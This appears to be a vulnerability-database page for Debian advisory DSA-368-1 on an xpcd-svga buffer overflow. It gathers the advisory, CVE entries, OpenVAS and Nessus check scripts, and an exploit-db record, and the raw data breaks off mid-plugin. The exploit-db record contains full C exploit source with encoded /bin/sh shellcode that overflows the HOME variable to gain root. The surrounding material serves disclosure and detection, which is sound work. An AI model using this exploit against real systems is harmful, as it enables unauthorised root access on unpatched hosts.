[SECURITY] [DSA-368-1] New xpcd packages fix buffer overflow
2003-08-10T00:00:00
ID SECURITYVULNS:DOC:4970 Type securityvulns Reporter Securityvulns Modified 2003-08-10T00:00:00
Description
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Debian Security Advisory DSA 368-1 security@debian.org
http://www.debian.org/security/ Matt Zimmerman
August 8th, 2003 http://www.debian.org/security/faq
Package : xpcd
Vulnerability : buffer overflow
Problem-Type : local
Debian-specific: no
CVE Ids : CAN-2003-0649
Steve Kemp discovered a buffer overflow in xpcd-svga which can be
triggered by a long HOME environment variable. This vulnerability
could be exploited by a local attacker to gain root privileges.
For the stable distribution (woody) this problem has been fixed in
version 2.08-8woody1.
For the unstable distribution (sid) this problem will be fixed soon.
We recommend that you update your xpcd package.
Upgrade Instructions
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
These files will probably be moved into the stable distribution on
its next revision.
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)
{"id": "SECURITYVULNS:DOC:4970", "bulletinFamily": "software", "title": "[SECURITY] [DSA-368-1] New xpcd packages fix buffer overflow", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- --------------------------------------------------------------------------\r\nDebian Security Advisory DSA 368-1 security@debian.org\r\nhttp://www.debian.org/security/ Matt Zimmerman\r\nAugust 8th, 2003 http://www.debian.org/security/faq\r\n- --------------------------------------------------------------------------\r\n\r\nPackage : xpcd\r\nVulnerability : buffer overflow\r\nProblem-Type : local\r\nDebian-specific: no\r\nCVE Ids : CAN-2003-0649\r\n\r\nSteve Kemp discovered a buffer overflow in xpcd-svga which can be\r\ntriggered by a long HOME environment variable. This vulnerability\r\ncould be exploited by a local attacker to gain root privileges.\r\n\r\nFor the stable distribution (woody) this problem has been fixed in\r\nversion 2.08-8woody1.\r\n\r\nFor the unstable distribution (sid) this problem will be fixed soon.\r\n\r\nWe recommend that you update your xpcd package.\r\n\r\nUpgrade Instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\nDebian GNU/Linux 3.0 alias woody\r\n- --------------------------------\r\n\r\n Source archives:\r\n\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1.dsc\r\n Size/MD5 checksum: 706 4fb68483cbb6d45728f47e5c61b3eaff\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1.diff.gz\r\n Size/MD5 checksum: 14077 f0e7c9e426744ccf0bcfbce07197bfb3\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08.orig.tar.gz\r\n Size/MD5 checksum: 103104 59bf5b8d0466ecb3c58ed1fffcdf499e\r\n\r\n Alpha architecture:\r\n\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_alpha.deb\r\n Size/MD5 checksum: 80992 68a06c0a55a1310f2f7bb04605ce2d68\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_alpha.deb\r\n Size/MD5 checksum: 13352 bb4948c36af672bb59b16741ee35f3f1\r\n\r\n ARM architecture:\r\n\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_arm.deb\r\n Size/MD5 checksum: 67922 851e5199d0eff2f142ff1a0ae7dec210\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_arm.deb\r\n Size/MD5 checksum: 11810 b6c7ee2ae9af286bd077bfb0bca66423\r\n\r\n Intel IA-32 architecture:\r\n\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_i386.deb\r\n Size/MD5 checksum: 64238 cfa0b813d7fda7c9b5dbe66700d3d13f\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_i386.deb\r\n Size/MD5 checksum: 11708 280a130ec6054eca1f8f3b4be94b9744\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-svga_2.08-8woody1_i386.deb\r\n Size/MD5 checksum: 20822 5cb42524e3ce21f35bc43aa5ef7f9967\r\n\r\n Intel IA-64 architecture:\r\n\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_ia64.deb\r\n Size/MD5 checksum: 97682 249299d45d8a1539799969d2eb82ecf9\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_ia64.deb\r\n Size/MD5 checksum: 15310 4218754ba8daa1991e67ea7dada45c0a\r\n\r\n HP Precision architecture:\r\n\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_hppa.deb\r\n Size/MD5 checksum: 73288 1cf15bb993b1c4f4d648b0a87f021da4\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_hppa.deb\r\n Size/MD5 checksum: 12800 fb8bd7ac68ce65630c4678de898b9702\r\n\r\n Motorola 680x0 architecture:\r\n\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_m68k.deb\r\n Size/MD5 checksum: 62626 45a7e74314164cfbf6de164da91331f6\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_m68k.deb\r\n Size/MD5 checksum: 11488 6c68962e1cc32a221ebe11357790f21e\r\n\r\n Big endian MIPS architecture:\r\n\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_mips.deb\r\n Size/MD5 checksum: 73488 43e5783d423f3054a57b55d95bd0d214\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_mips.deb\r\n Size/MD5 checksum: 12594 72855f1617071135eebee4c12867a26a\r\n\r\n Little endian MIPS architecture:\r\n\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_mipsel.deb\r\n Size/MD5 checksum: 73164 9d006b85dc71297638479002a0260fe0\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_mipsel.deb\r\n Size/MD5 checksum: 12558 ccffee63fc2c8c35e5a87ce0cb450a37\r\n\r\n PowerPC architecture:\r\n\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_powerpc.deb\r\n Size/MD5 checksum: 68436 752053140f35df568c14c8abc5f2e7ef\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_powerpc.deb\r\n Size/MD5 checksum: 11896 fbbd067d762d0d6f7ba4e2a92dd67397\r\n\r\n IBM S/390 architecture:\r\n\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_s390.deb\r\n Size/MD5 checksum: 69600 60c613113c20c8bf80b1a9d44836697b\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_s390.deb\r\n Size/MD5 checksum: 12486 8b63fbf6feeaaf4a3b1c64674bcfca9b\r\n\r\n Sun Sparc architecture:\r\n\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_sparc.deb\r\n Size/MD5 checksum: 72736 db142879397f6e3723641acee424f3b5\r\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_sparc.deb\r\n Size/MD5 checksum: 11780 3acbff9fae774d384aa8546048a2ea40\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next revision.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.2 (GNU/Linux)\r\n\r\niD8DBQE/M660ArxCt0PiXR4RAlc/AJ91ZKq6hjL/ff217KV37l14V5iiTgCfVULk\r\nMs4IRRGySthWoyOJpZp610w=\r\n=NQPq\r\n-----END PGP SIGNATURE-----\r\n", "published": "2003-08-10T00:00:00", "modified": "2003-08-10T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4970", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2003-0649"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:08", "edition": 1, "viewCount": 1, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2018-08-31T11:10:08", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0649"]}, {"type": "debian", "idList": ["DEBIAN:DSA-368-1:AF900"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-368.NASL", "MANDRAKE_MDKSA-2004-053.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:6582"]}, {"type": "openvas", "idList": ["OPENVAS:53656"]}, {"type": "exploitdb", "idList": ["EDB-ID:22996"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:6285"]}], "modified": "2018-08-31T11:10:08", "rev": 2}, "vulnersScore": 6.9}, "affectedSoftware": [], "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:22:09", "description": "Buffer overflow in xpcd-svga for xpcd 2.08 and earlier allows local users to execute arbitrary code via a long HOME environment variable.", "edition": 6, "cvss3": {}, "published": "2003-08-27T04:00:00", "title": "CVE-2003-0649", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0649"], "modified": "2008-09-10T19:20:00", "cpe": ["cpe:/a:xpcd:xpcd:2.08"], "id": "CVE-2003-0649", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0649", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:xpcd:xpcd:2.08:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:01", "bulletinFamily": "software", "cvelist": ["CVE-2003-0649"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in xpcd. The xpcd fails to check the boundary of the HOME environment variable, resulting in a buffer overflow. By sending a long string to $Home, a local attacker can overflow the buffer and execute arbitrary code on the server with elevated privileges, resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 2.08-8woody1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA local overflow exists in xpcd. The xpcd fails to check the boundary of the HOME environment variable, resulting in a buffer overflow. By sending a long string to $Home, a local attacker can overflow the buffer and execute arbitrary code on the server with elevated privileges, resulting in a loss of integrity.\n## References:\n[Vendor Specific Advisory URL](http://www.debian.org/security/2003/dsa-368)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:053)\n[Secunia Advisory ID:11750](https://secuniaresearch.flexerasoftware.com/advisories/11750/)\n[Secunia Advisory ID:9485](https://secuniaresearch.flexerasoftware.com/advisories/9485/)\nISS X-Force ID: 12357\nGeneric Exploit URL: http://www.securiteam.com/exploits/5CP0F2AAAU.html\n[CVE-2003-0649](https://vulners.com/cve/CVE-2003-0649)\nBugtraq ID: 8370\n", "modified": "2003-06-18T00:00:00", "published": "2003-06-18T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:6582", "id": "OSVDB:6582", "type": "osvdb", "title": "xpcd xpcd-svga HOME Variable Overflow", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0649"], "description": "The remote host is missing an update to xpcd\nannounced via advisory DSA 368-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53656", "href": "http://plugins.openvas.org/nasl.php?oid=53656", "type": "openvas", "title": "Debian Security Advisory DSA 368-1 (xpcd)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_368_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 368-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Steve Kemp discovered a buffer overflow in xpcd-svga which can be\ntriggered by a long HOME environment variable. This vulnerability\ncould be exploited by a local attacker to gain root privileges.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.08-8woody1.\n\nFor the unstable distribution (sid) this problem will be fixed soon.\n\nWe recommend that you update your xpcd package.\";\ntag_summary = \"The remote host is missing an update to xpcd\nannounced via advisory DSA 368-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20368-1\";\n\nif(description)\n{\n script_id(53656);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(8370);\n script_cve_id(\"CVE-2003-0649\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 368-1 (xpcd)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"xpcd\", ver:\"2.08-8woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xpcd-gimp\", ver:\"2.08-8woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xpcd-svga\", ver:\"2.08-8woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T20:01:45", "description": "XPCD 2.0.8 Home Environment Variable Local Buffer Overflow Vulnerability. CVE-2003-0649. Local exploit for linux platform", "published": "2003-07-18T00:00:00", "type": "exploitdb", "title": "XPCD 2.0.8 Home Environment Variable Local Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0649"], "modified": "2003-07-18T00:00:00", "id": "EDB-ID:22996", "href": "https://www.exploit-db.com/exploits/22996/", "sourceData": "source: http://www.securityfocus.com/bid/8370/info\r\n\r\nA problem in the handling of long strings in environment variables by xpcd may result in a buffer overflow condition. This may allow an attacker to gain unauthorized access to system resources.\r\n\r\n/**************************************************************************** \r\n * xpcd 2.0.8 [latest] exploit written by r-code [Elite FXP Team] * \r\n * * \r\n * Actually xpcd usually isn`t suid, therefore for most of you * \r\n * this exploit will be useless, on the other hand, maybe on some * \r\n * conditions someone sets +S (who knows... ;-) * \r\n * * \r\n * Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher * \r\n * Flames to: ElSiLaSoF - fucking kiddie.. * \r\n \r\n****************************************************************************/ \r\n\r\n\r\n#include <stdio.h> \r\n#include <unistd.h> \r\n#include <stdlib.h> \r\n\r\n\r\nunsigned long int get_sp(void) { \r\n __asm__(\"movl %esp,%eax\"); \r\n} \r\n\r\n\r\nchar shellcode[] = \r\n\r\n\r\n\"\\xeb\\x03\\x5e\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x83\\xc6\\x0d\\x31\\xc9\\xb1\\x60\\x80\\x36\" \r\n\"\\x01\\x46\\xe2\\xfa\\xea\\x09\\x2e\\x63\\x68\\x6f\\x2e\\x72\\x69\\x01\\x80\\xed\\x66\\x2a\\x01\\x01\" \r\n\"\\x54\\x88\\xe4\\x82\\xed\\x1d\\x56\\x57\\x52\\xe9\\x01\\x01\\x01\\x01\\x5a\\x80\\xc2\\x83\\x10\" \r\n\"\\x01\\x01\\xc6\\x44\\xfd\\x01\\x01\\x01\\x01\\x8c\\xba\\x63\\xef\\xfe\\xfe\\x88\\x7c\\xf9\\xb9\" \r\n\"\\x47\\x01\\x01\\x01\\x30\\xf7\\x30\\xc8\\x52\\x88\\xf2\\xcc\\x81\\x8c\\x4c\\xf9\\xb9\\x0a\\x01\" \r\n\"\\x01\\x01\\x88\\xff\\x30\\xd3\\x52\\x88\\xf2\\xcc\\x81\\x5a\\x5f\\x5e\\xc8\\xc2\\x8c\\x77\\x01\" \r\n\"\\x91\\x91\\x91\\x91\"; \r\n\r\n\r\n\r\n#define LEN 280 \r\n#define DEFAULT_OFFSET 530 \r\n#define PATH \"/usr/local/bin/xpcd\" \r\n\r\n\r\nint main(int argc,char **argv) { \r\n register int i; \r\n char *evilstr=0,*str=0,*e=0; \r\n unsigned long int retaddr=0,offset=DEFAULT_OFFSET,*ptr=0; \r\n \r\n printf(\"[=] xpcd0x01 exploit written by r-code d_fence(at)gmx(dot)net \r\n[ELITE FXP TEAM]\\n\"); \r\n printf(\"[=] Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, \r\nCypher\\n\"); \r\n printf(\"[=] Flames to: ElSiLaSoF - fucking kiddie.\\n\\n\"); \r\n \r\n \r\n if(argc>1) \r\n offset=atoi(argv[1]); \r\n \r\n retaddr=get_sp() - offset; \r\n \r\n printf(\"iNFO:) esp: 0x%x offset: 0x%x ret_addr: \r\n0x%x\\n\",get_sp(),offset,retaddr); \r\n printf(\"iNFO:) If Doesn`t work, try with OFFSETS 400 - 600\\n\\n\"); \r\n \r\n evilstr=(char *)malloc(LEN); \r\n e=(char *)malloc(LEN+10); \r\n ptr=(unsigned long int *)evilstr; \r\n \r\n for(i=0;i<(LEN);) { \r\n evilstr[i++] = (retaddr & 0x000000ff); \r\n evilstr[i++] = (retaddr & 0x0000ff00) >> 8; \r\n evilstr[i++] = (retaddr & 0x00ff0000) >> 16; \r\n evilstr[i++] = (retaddr & 0xff000000) >> 24; \r\n } \r\n \r\n memset(evilstr,'A',(LEN/2)); \r\n \r\n for(i=0;i<strlen(shellcode);i++) \r\n evilstr[(LEN/2)-(strlen(shellcode)/2)+i]=shellcode[i]; \r\n \r\n evilstr[LEN]=0x00; \r\n memcpy(e,\"HOME=\",5); \r\n memcpy(e+5,evilstr,LEN); \r\n putenv(e); \r\n execl(PATH,\"xpcd\",NULL); \r\n \r\n} \r\n\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/22996/"}], "debian": [{"lastseen": "2020-11-11T13:16:53", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0649"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 368-1 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nAugust 8th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : xpcd\nVulnerability : buffer overflow\nProblem-Type : local\nDebian-specific: no\nCVE Ids : CAN-2003-0649\n\nSteve Kemp discovered a buffer overflow in xpcd-svga which can be\ntriggered by a long HOME environment variable. This vulnerability\ncould be exploited by a local attacker to gain root privileges.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.08-8woody1.\n\nFor the unstable distribution (sid) this problem will be fixed soon.\n\nWe recommend that you update your xpcd package.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1.dsc\n Size/MD5 checksum: 706 4fb68483cbb6d45728f47e5c61b3eaff\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1.diff.gz\n Size/MD5 checksum: 14077 f0e7c9e426744ccf0bcfbce07197bfb3\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08.orig.tar.gz\n Size/MD5 checksum: 103104 59bf5b8d0466ecb3c58ed1fffcdf499e\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_alpha.deb\n Size/MD5 checksum: 80992 68a06c0a55a1310f2f7bb04605ce2d68\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_alpha.deb\n Size/MD5 checksum: 13352 bb4948c36af672bb59b16741ee35f3f1\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_arm.deb\n Size/MD5 checksum: 67922 851e5199d0eff2f142ff1a0ae7dec210\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_arm.deb\n Size/MD5 checksum: 11810 b6c7ee2ae9af286bd077bfb0bca66423\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_i386.deb\n Size/MD5 checksum: 64238 cfa0b813d7fda7c9b5dbe66700d3d13f\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_i386.deb\n Size/MD5 checksum: 11708 280a130ec6054eca1f8f3b4be94b9744\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-svga_2.08-8woody1_i386.deb\n Size/MD5 checksum: 20822 5cb42524e3ce21f35bc43aa5ef7f9967\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_ia64.deb\n Size/MD5 checksum: 97682 249299d45d8a1539799969d2eb82ecf9\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_ia64.deb\n Size/MD5 checksum: 15310 4218754ba8daa1991e67ea7dada45c0a\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_hppa.deb\n Size/MD5 checksum: 73288 1cf15bb993b1c4f4d648b0a87f021da4\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_hppa.deb\n Size/MD5 checksum: 12800 fb8bd7ac68ce65630c4678de898b9702\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_m68k.deb\n Size/MD5 checksum: 62626 45a7e74314164cfbf6de164da91331f6\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_m68k.deb\n Size/MD5 checksum: 11488 6c68962e1cc32a221ebe11357790f21e\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_mips.deb\n Size/MD5 checksum: 73488 43e5783d423f3054a57b55d95bd0d214\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_mips.deb\n Size/MD5 checksum: 12594 72855f1617071135eebee4c12867a26a\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_mipsel.deb\n Size/MD5 checksum: 73164 9d006b85dc71297638479002a0260fe0\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_mipsel.deb\n Size/MD5 checksum: 12558 ccffee63fc2c8c35e5a87ce0cb450a37\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_powerpc.deb\n Size/MD5 checksum: 68436 752053140f35df568c14c8abc5f2e7ef\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_powerpc.deb\n Size/MD5 checksum: 11896 fbbd067d762d0d6f7ba4e2a92dd67397\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_s390.deb\n Size/MD5 checksum: 69600 60c613113c20c8bf80b1a9d44836697b\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_s390.deb\n Size/MD5 checksum: 12486 8b63fbf6feeaaf4a3b1c64674bcfca9b\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd_2.08-8woody1_sparc.deb\n Size/MD5 checksum: 72736 db142879397f6e3723641acee424f3b5\n http://security.debian.org/pool/updates/main/x/xpcd/xpcd-gimp_2.08-8woody1_sparc.deb\n Size/MD5 checksum: 11780 3acbff9fae774d384aa8546048a2ea40\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2003-08-08T00:00:00", "published": "2003-08-08T00:00:00", "id": "DEBIAN:DSA-368-1:AF900", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00168.html", "title": "[SECURITY] [DSA-368-1] New xpcd packages fix buffer overflow", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-06T09:49:47", "description": "Steve Kemp discovered a buffer overflow in xpcd-svga which can be\ntriggered by a long HOME environment variable. This vulnerability\ncould be exploited by a local attacker to gain root privileges.", "edition": 25, "published": "2004-09-29T00:00:00", "title": "Debian DSA-368-1 : xpcd - buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0649"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:xpcd"], "id": "DEBIAN_DSA-368.NASL", "href": "https://www.tenable.com/plugins/nessus/15205", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-368. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15205);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2003-0649\");\n script_bugtraq_id(8370);\n script_xref(name:\"DSA\", value:\"368\");\n\n script_name(english:\"Debian DSA-368-1 : xpcd - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Steve Kemp discovered a buffer overflow in xpcd-svga which can be\ntriggered by a long HOME environment variable. This vulnerability\ncould be exploited by a local attacker to gain root privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 